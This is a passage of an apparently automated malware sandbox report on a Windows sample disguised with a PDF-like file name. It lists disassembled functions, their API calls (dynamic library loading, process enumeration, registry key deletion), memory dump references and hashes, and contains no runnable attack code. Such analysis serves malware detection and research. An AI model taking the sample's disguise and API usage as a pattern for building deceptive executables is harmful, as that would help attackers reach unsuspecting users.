                                      • Instruction Fuzzy Hash: D31175715102057BCB23BF509C86FE9376C9F45714F00906AFE0CAE142DB74A546DB71
                                      Function 003AA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003AA46D
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003AA482
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003AA48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: 5dbd05dd210a5fdf813b386ef044717584b320fe76071686d2f88b1f62e627ec
                                      • Instruction ID: 1b137bf9442fe3dc3b8ed93f8ee333441868e1706e5997e25928a77b43a22419
                                      • Opcode Fuzzy Hash: 5dbd05dd210a5fdf813b386ef044717584b320fe76071686d2f88b1f62e627ec
                                      • Instruction Fuzzy Hash: 4311E772200208BEEF225F65CC46FAB3B6DEF89754F024128FA45A61A1D7B2E811C724
                                      Function 00362287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00362350,?), ref: 003622A1
                                      • GetProcAddress.KERNEL32(00000000), ref: 003622A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 2574300362-340411864
                                      • Opcode ID: 061b03e113fd36d58b3cb80a3b7fb60f15bd991caba0ef47a4d676debe18c04d
                                      • Instruction ID: 10ae4f635a3fca6262cbf21446ac0063556212b09b5a5b5e1ca4d0c921c619e1
                                      • Opcode Fuzzy Hash: 061b03e113fd36d58b3cb80a3b7fb60f15bd991caba0ef47a4d676debe18c04d
                                      • Instruction Fuzzy Hash: ECE01A74A90701ABDB925F71ED49F653668BB00706F008434F142E90B4CFB65440DF08
                                      Function 0036235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00362276), ref: 00362376
                                      • GetProcAddress.KERNEL32(00000000), ref: 0036237D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 2574300362-2819208100
                                      • Opcode ID: 9e450e52136220866fa385a3f9f4a2ad19b9f21d68d5aa7fae401172d800b000
                                      • Instruction ID: 60f59e0b4ec5989ad281798e13c10b6d06e6ba528c4878880720411397683414
                                      • Opcode Fuzzy Hash: 9e450e52136220866fa385a3f9f4a2ad19b9f21d68d5aa7fae401172d800b000
                                      • Instruction Fuzzy Hash: 86E0ECB4544701AFDB235F61FE0DF153A68B704702F124438F20EEA1B4CBBA6800DB18
                                      Function 00361113 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00361150,00000000,?,00367DA7,000000FF,0000001E,003F6D60,00000008,00367D0B,00000000,00000000), ref: 00361122
                                      • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00361134
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 1646373207-1276376045
                                      • Opcode ID: fcad9d5f99c29ddae6bf47a7b61f8254401c9091ff5ad1a5f26ec92a54732e09
                                      • Instruction ID: 1c518a42fe8d188d043b7874c981f3c315761146f9b983a8ebbb5eb387f84610
                                      • Opcode Fuzzy Hash: fcad9d5f99c29ddae6bf47a7b61f8254401c9091ff5ad1a5f26ec92a54732e09
                                      • Instruction Fuzzy Hash: 46D09E35654208BBDB039BA2DC06F9A7BACAB41B41F044074FA06E10A4EB61EF11A765
                                      Function 003A2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,003A21FB,?,003A23EF), ref: 003A2213
                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 003A2225
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetProcessId$kernel32.dll
                                      • API String ID: 2574300362-399901964
                                      • Opcode ID: b60ff05bbdae7157f588f85563fbdb6d0bd629c961b7bcfa253712c1413c84f8
                                      • Instruction ID: 377c5f184875f753e64b17819e7f2d7697bc913a206f8621e04dd9665516bf9e
                                      • Opcode Fuzzy Hash: b60ff05bbdae7157f588f85563fbdb6d0bd629c961b7bcfa253712c1413c84f8
                                      • Instruction Fuzzy Hash: ADD0A73480071A9FD7675F34FC08B5376DCEB06300F154829F846E2150D770E8808750
                                      Function 003442F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003442EC,?,003442AA,?), ref: 00344304
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00344316
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      • Opcode ID: 21caaa99a20e514e9a701526505d32105f8ca43fbb8a98cf9855baf8cd802f72
                                      • Instruction ID: 14f69b9f9b13018155dce60b926ab641e6817146d80015be1c36d42ca7e929e2
                                      • Opcode Fuzzy Hash: 21caaa99a20e514e9a701526505d32105f8ca43fbb8a98cf9855baf8cd802f72
                                      • Instruction Fuzzy Hash: 05D0A7348047129FC7634F20EC0CB5276D8AB14701F154439F542D2160D7B0E8808710
                                      Function 0034434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,003441BB,00344341,?,0034422F,?,003441BB,?,?,?,?,003439FE,?,00000001), ref: 00344359
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0034436B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      • Opcode ID: 01ed62f9c60a0fd28b8d28af5e824d729c93322d5b2ac44f80e197e0b0e9cf85
                                      • Instruction ID: 6c304e0e45ed581fdb2e277abb8e2a8acb9fe05437ce20bc6d21e3e261f51785
                                      • Opcode Fuzzy Hash: 01ed62f9c60a0fd28b8d28af5e824d729c93322d5b2ac44f80e197e0b0e9cf85
                                      • Instruction Fuzzy Hash: 83D0A934800712AFC7234F30EC09B9276E8AB20B15F16C43AF882D2290EBB0F8808B10
                                      Function 00380539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,0038051D,?,003805FE), ref: 00380547
                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00380559
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                      • API String ID: 2574300362-1071820185
                                      • Opcode ID: 8b6e4378581748d39e9d5935e6d25d269a739969a6b6ec015b2fea6af1779638
                                      • Instruction ID: 15b9f70c088b1dbe07bf9243fbf402afbe20a113cf51d6d499c0fbe068d9457f
                                      • Opcode Fuzzy Hash: 8b6e4378581748d39e9d5935e6d25d269a739969a6b6ec015b2fea6af1779638
                                      • Instruction Fuzzy Hash: 8BD0A730414712DFC7629F21EC08A5677E8AB01301F15C46DF457D2250D670D8848B20
                                      Function 00380564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0038052F,?,003806D7), ref: 00380572
                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00380584
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                      • API String ID: 2574300362-1587604923
                                      • Opcode ID: da4141c971c40b97ec2569e2a409006f536116bf36804fe10128fe24090aeacb
                                      • Instruction ID: 3271dc7b7e470bd90fb4d8384e53ece4c29d05a25879ddef1cac95945874962f
                                      • Opcode Fuzzy Hash: da4141c971c40b97ec2569e2a409006f536116bf36804fe10128fe24090aeacb
                                      • Instruction Fuzzy Hash: 49D05E304147169EC7626F20A848A5377E8AB05300F158469F942D2654D670D4848B20
                                      Function 0039ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0039ECBE,?,0039EBBB), ref: 0039ECD6
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0039ECE8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      • Opcode ID: 62aa44e2be6defbb887124ec997996426d352fcce35c72e55aac819dee11cd36
                                      • Instruction ID: 0b199319a1db2fd5b49b0b7a142205c7b85b3c694367f345f3a36bd2db34ebed
                                      • Opcode Fuzzy Hash: 62aa44e2be6defbb887124ec997996426d352fcce35c72e55aac819dee11cd36
                                      • Instruction Fuzzy Hash: CDD0A7308007239FCF239F61EC48A5376E8AB00300F158829F886D2150DB70D8808B10
                                      Function 0039BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0039BAD3,00000001,0039B6EE,?,003DDC00), ref: 0039BAEB
                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0039BAFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetModuleHandleExW$kernel32.dll
                                      • API String ID: 2574300362-199464113
                                      • Opcode ID: 41e2f2c9f92fa8b1f8516691fd4b574adb3d30d908ce0e24a929b30f47ad135f
                                      • Instruction ID: e4432852f016f0459d2772ff6f3b745ee8266f024fe34b29598d2b7de5bfeb6e
                                      • Opcode Fuzzy Hash: 41e2f2c9f92fa8b1f8516691fd4b574adb3d30d908ce0e24a929b30f47ad135f
                                      • Instruction Fuzzy Hash: 3FD05E308047129FCB325F20B848A62B6D8AB00300F154429E943D2294DB70D880C710
                                      Function 003A3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,003A3BD1,?,003A3E06), ref: 003A3BE9
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003A3BFB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: d9aeb69571b41c80161e0c27d8db624345cc18b98f46b4d378a2f43dee40b707
                                      • Instruction ID: 49e85fc247e58c8b241aaa922c4848b87589f87ff4ef3096afbcd92e1997dfc4
                                      • Opcode Fuzzy Hash: d9aeb69571b41c80161e0c27d8db624345cc18b98f46b4d378a2f43dee40b707
                                      • Instruction Fuzzy Hash: 00D0A7705007169FC7225F60EC09A93BAF8EB03324F154429F446E2150D6B0D4808F10
                                      Function 00379B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 43cb1b24387e82cc51b871a9fecb92628409725c946f793359169eba2e8301dc
                                      • Instruction ID: fd3d77edfc775469d0c2ebfa93aaceacd1d848d2db7fb93f6a9ebc3a6e415d03
                                      • Opcode Fuzzy Hash: 43cb1b24387e82cc51b871a9fecb92628409725c946f793359169eba2e8301dc
                                      • Instruction Fuzzy Hash: 51C15E75A00216EFDB26CF94C884BAEB7B5FF48700F118699E909AB251D734DE41DB90
                                      Function 0039AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0039AAB4
                                      • CoUninitialize.OLE32 ref: 0039AABF
                                        • Part of subcall function 00380213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0038027B
                                      • VariantInit.OLEAUT32(?), ref: 0039AACA
                                      • VariantClear.OLEAUT32(?), ref: 0039AD9D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 9de1c83d26e827a1953faeec6d8d1fbc74fda21ec82304402bc27fa1ce564888
                                      • Instruction ID: 339ad5db0db9b953a462aacbf78acb55809a8b609ee3fa3e57c1f59d0b3efb2a
                                      • Opcode Fuzzy Hash: 9de1c83d26e827a1953faeec6d8d1fbc74fda21ec82304402bc27fa1ce564888
                                      • Instruction Fuzzy Hash: FCA11775204B019FCB12EF14C491B1AB7E5BF89710F154959FA969B3A2CB30FD44CB86
                                      Function 003791CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: 15a885bbba0351e1a5badc4b544870b266c5849ce038362157d9b59ef6a2da3a
                                      • Instruction ID: 4a570ee69782b057961b2c55c23706b030bc818a1af9cf0de45cd87d133fd1dc
                                      • Opcode Fuzzy Hash: 15a885bbba0351e1a5badc4b544870b266c5849ce038362157d9b59ef6a2da3a
                                      • Instruction Fuzzy Hash: 42518334604706DBEB36AF669491B2AB3E9EF45310F20C91FE54ECB6E1DB7898408701
                                      Function 003A1BDF Relevance: 6.2, APIs: 4, Instructions: 163processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 003A1C18
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 003A1C26
                                      • Process32NextW.KERNEL32(00000000,?), ref: 003A1CDF
                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 003A1CF1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: fa3562a0465fade33d61cf16c6643c6354ce5db68c92ab79e6f491aa1cf710ce
                                      • Instruction ID: c289d8a0083bfe5643d19b3b145ef06300fee609edd48481965fe7855dba6d2f
                                      • Opcode Fuzzy Hash: fa3562a0465fade33d61cf16c6643c6354ce5db68c92ab79e6f491aa1cf710ce
                                      • Instruction Fuzzy Hash: 26515E711043409FD722EF64D885EABB7ECEF89754F04492EF9859B261EB70E904CB92
                                      Function 003AC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(00F270F0,?), ref: 003AC544
                                      • ScreenToClient.USER32(?,00000002), ref: 003AC574
                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 003AC5DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
